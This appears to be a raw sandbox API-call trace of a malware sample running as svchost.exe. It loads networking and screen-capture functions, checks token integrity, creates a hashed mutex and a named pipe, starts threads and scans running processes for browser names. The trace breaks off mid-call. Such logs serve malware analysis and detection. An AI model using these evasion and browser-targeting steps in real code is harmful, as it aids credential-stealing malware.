[0214.961] GetProcAddress (hModule=0x75130000, lpProcName="CreateDCW") returned 0x7514e743 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleDC") returned 0x751454f4 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="SelectObject") returned 0x75144f70 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleBitmap") returned 0x75145f49 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="BitBlt") returned 0x75145ea6 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="DeleteDC") returned 0x751458b3 [0214.961] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0214.964] GetProcAddress (hModule=0x75350000, lpProcName="InternetConnectA") returned 0x753749e9 [0214.964] GetProcAddress (hModule=0x75350000, lpProcName="InternetReadFile") returned 0x7536b406 [0214.964] GetProcAddress (hModule=0x75350000, lpProcName="HttpQueryInfoA") returned 0x7536a33e [0214.964] GetProcAddress (hModule=0x75350000, lpProcName="InternetQueryOptionA") returned 0x75361b56 [0214.964] GetProcAddress (hModule=0x75350000, lpProcName="HttpOpenRequestA") returned 0x75374c7d [0214.964] GetProcAddress (hModule=0x75350000, lpProcName="InternetCrackUrlA") returned 0x7535d075 [0214.965] GetProcAddress (hModule=0x75350000, lpProcName="InternetSetOptionA") returned 0x753675e8 [0214.965] GetProcAddress (hModule=0x75350000, lpProcName="InternetOpenA") returned 0x7537f18e [0214.965] GetProcAddress (hModule=0x75350000, lpProcName="InternetCloseHandle") returned 0x7536ab49 [0214.965] GetProcAddress (hModule=0x75350000, lpProcName="HttpSendRequestA") returned 0x753e18f8 [0214.965] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76c40000 [0214.965] GetProcAddress (hModule=0x76c40000, lpProcName="ObtainUserAgentString") returned 0x76c71d76 [0214.965] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76b60000 [0214.965] GetProcAddress (hModule=0x76b60000, lpProcName=0x9) returned 0x76b63eae [0214.965] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x748e0000 [0214.966] GetProcAddress (hModule=0x748e0000, lpProcName="GetUserNameExW") returned 0x74dea415 [0214.966] GetCurrentProcessId () returned 0x634 [0214.967] CryptAcquireContextW (in: phProv=0xc7e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xc7e5c*=0x5ce888) returned 1 [0214.976] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0xb84e9) returned 0x5ce4a8 [0214.976] InitializeSecurityDescriptor (in: pSecurityDescriptor=0xc77f0, dwRevision=0x1 | out: pSecurityDescriptor=0xc77f0) returned 1 [0214.976] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0xc77f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0xc77f0) returned 1 [0214.976] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0214.979] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5ca748, lpbSaclPresent=0x3cf3a0, pSacl=0x3cf3a8, lpbSaclDefaulted=0x3cf3a4 | out: lpbSaclPresent=0x3cf3a0, pSacl=0x3cf3a8, lpbSaclDefaulted=0x3cf3a4) returned 1 [0214.979] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0xc77f0, bSaclPresent=1, pSacl=0x5ca75c, bSaclDefaulted=0 | out: pSecurityDescriptor=0xc77f0) returned 1 [0214.980] GetVersionExW (in: lpVersionInformation=0x3cf294*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x772a3472, dwMinorVersion=0x0, dwBuildNumber=0x5d1820, dwPlatformId=0x0, szCSDVersion="ⴼ疠ⴼ疠") | out: lpVersionInformation=0x3cf294*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0214.980] GetVersionExW (in: lpVersionInformation=0x3cf280*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x3cf338, dwMinorVersion=0xb7dfd, dwBuildNumber=0x6, dwPlatformId=0x1, szCSDVersion="Ĝ") | out: lpVersionInformation=0x3cf280*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0214.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x3cf3ac | out: TokenHandle=0x3cf3ac*=0xe0) returned 1 [0214.980] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x3cf3a8 | out: TokenInformation=0x0, ReturnLength=0x3cf3a8) returned 0 [0214.980] GetLastError () returned 0x7a [0214.980] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0xf4f7d0, TokenInformationLength=0x14, ReturnLength=0x3cf3a8 | out: TokenInformation=0xf4f7d0, ReturnLength=0x3cf3a8) returned 1 [0214.980] GetSidSubAuthorityCount (pSid=0xf4f7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xf4f7d9 [0214.980] GetSidSubAuthority (pSid=0xf4f7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xf4f7e0 [0214.980] CloseHandle (hObject=0xe0) returned 1 [0214.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3cfe24 | out: TokenHandle=0x3cfe24*=0xe0) returned 1 [0214.980] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x3cfe0c | out: TokenInformation=0x0, ReturnLength=0x3cfe0c) returned 0 [0214.980] GetLastError () returned 0x7a [0214.980] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0xf4f7d0, TokenInformationLength=0x24, ReturnLength=0x3cfe0c | out: TokenInformation=0xf4f7d0, ReturnLength=0x3cfe0c) returned 1 [0214.980] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0xc, TokenInformation=0xc77e0, TokenInformationLength=0x4, ReturnLength=0x3cfe20 | out: TokenInformation=0xc77e0, ReturnLength=0x3cfe20) returned 1 [0214.980] CloseHandle (hObject=0xe0) returned 1 [0214.980] GetLengthSid (pSid=0xf4f7d8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0214.980] GetCurrentProcess () returned 0xffffffff [0214.980] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x3cfc24, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe")) returned 0x1f [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="E5") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="8E") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="FF") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="54") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="09") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="68") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="A4") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="36") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="E9") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="82") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="FC") returned 2 [0214.980] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="FA") returned 2 [0214.981] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="1C") returned 2 [0214.981] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="04") returned 2 [0214.981] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="45") returned 2 [0214.981] wvnsprintfW (in: pszDest=0x3cfb70, cchDest=3, pszFmt="%02X", arglist=0x3cfb4c | out: pszDest="A2") returned 2 [0214.981] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0xe0 [0214.981] GetLastError () returned 0x0 [0214.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xbb1d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0214.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb95f6, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0214.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb99af, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0214.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xbb416, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf0 [0214.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xbc086, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4 [0214.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xbf274, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0214.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb8f74, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x3cf770 | out: lpThreadId=0x3cf770*=0xc4) returned 0xfc [0214.984] CloseHandle (hObject=0xfc) returned 1 Thread: id = 161 os_tid = 0xa10 Thread: id = 162 os_tid = 0x918 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="D3") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="B6") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="C4") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="DE") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="8C") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="F7") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="9A") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="85") returned 2 [0214.985] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="4B") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="54") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="9E") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="E2") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="32") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="F0") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="8C") returned 2 [0214.986] wvnsprintfW (in: pszDest=0xe0fa08, cchDest=3, pszFmt="%02X", arglist=0xe0f9e4 | out: pszDest="89") returned 2 [0214.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf4f870, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0214.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf4f870, cbMultiByte=11, lpWideCharStr=0xf4f888, cchWideChar=12 | out: lpWideCharStr="\\\\.\\pipe\\%s") returned 11 [0214.986] wvnsprintfW (in: pszDest=0xf4f8b0, cchDest=523, pszFmt="\\\\.\\pipe\\%s", arglist=0xe0fc64 | out: pszDest="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89") returned 41 [0214.986] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0214.986] CreateNamedPipeW (lpName="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89" (normalized: "\\device\\namedpipe\\d3b6c4de8cf79a854b549ee232f08c89"), dwOpenMode=0x40000003, dwPipeMode=0x0, nMaxInstances=0xff, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0xc77e4) returned 0x4c [0214.986] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb4 [0214.986] ConnectNamedPipe (in: hNamedPipe=0x4c, lpOverlapped=0xe0fce4 | out: lpOverlapped=0xe0fce4) returned 0 [0214.986] GetLastError () returned 0x3e5 [0214.986] WaitForMultipleObjects (nCount=0x2, lpHandles=0xe0fcdc*=0xb4, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 163 os_tid = 0x910 [0214.986] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0214.986] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0218.049] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77270000 [0218.049] GetProcAddress (hModule=0x77270000, lpProcName="NtQuerySystemInformation") returned 0x7728fda0 [0218.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xce40) returned 0xc0000004 [0218.049] VirtualAlloc (lpAddress=0x0, dwSize=0xde40, flAllocationType=0x1000, flProtect=0x4) returned 0x2d0000 [0218.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2d0000, Length=0xde40, ResultLength=0x0 | out: SystemInformation=0x2d0000, ResultLength=0x0) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0218.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0218.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0218.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0218.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0218.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x374 [0218.051] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.051] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.051] GetLastError () returned 0x7a [0218.051] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedb960, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedb960, ReturnLength=0xfcfa8c) returned 1 [0218.051] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.051] CloseHandle (hObject=0x36c) returned 1 [0218.051] CloseHandle (hObject=0x374) returned 1 [0218.051] GetLengthSid (pSid=0xedb968*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x374 [0218.051] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0xfcfa1a, dwBuildNumber=0xc900854c, dwPlatformId=0xedc468, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.051] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.051] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.051] GetLastError () returned 0x7a [0218.051] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedba30, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedba30, ReturnLength=0xfcfab8) returned 1 [0218.051] GetSidSubAuthorityCount (pSid=0xedba38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedba39 [0218.051] GetSidSubAuthority (pSid=0xedba38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedba40 [0218.051] CloseHandle (hObject=0x36c) returned 1 [0218.051] CloseHandle (hObject=0x374) returned 1 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedb168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedb168, cbMultiByte=11, lpWideCharStr=0xedb960, cchWideChar=12 | out: lpWideCharStr="firefox.exe") returned 11 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedb240, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedb240, cbMultiByte=10, lpWideCharStr=0xedb988, cchWideChar=11 | out: lpWideCharStr="chrome.exe") returned 10 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedb180, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedb180, cbMultiByte=9, lpWideCharStr=0xedba90, cchWideChar=10 | out: lpWideCharStr="opera.exe") returned 9 [0218.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedbad0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0218.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedbad0, cbMultiByte=12, lpWideCharStr=0xf0cb48, cchWideChar=13 | out: lpWideCharStr="iexplore.exe") returned 12 [0218.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedbb10, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0218.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedbb10, cbMultiByte=17, lpWideCharStr=0xedb9b0, cchWideChar=18 | out: lpWideCharStr="MicrosoftEdge.exe") returned 17 [0218.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedbb50, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0218.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xedbb50, cbMultiByte=19, lpWideCharStr=0xedc468, cchWideChar=20 | out: lpWideCharStr="MicrosoftEdgeCP.exe") returned 19 [0218.052] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0218.052] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0218.052] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0218.052] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0218.052] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0218.052] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0218.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x374 [0218.052] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.052] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.052] GetLastError () returned 0x7a [0218.052] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.052] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.052] CloseHandle (hObject=0x36c) returned 1 [0218.052] CloseHandle (hObject=0x374) returned 1 [0218.052] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x374 [0218.052] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d60c8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.052] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.052] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.052] GetLastError () returned 0x7a [0218.052] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.052] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.052] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.052] CloseHandle (hObject=0x36c) returned 1 [0218.052] CloseHandle (hObject=0x374) returned 1 [0218.052] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0218.053] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0218.053] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0218.053] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0218.053] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0218.053] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0218.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x374 [0218.053] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) 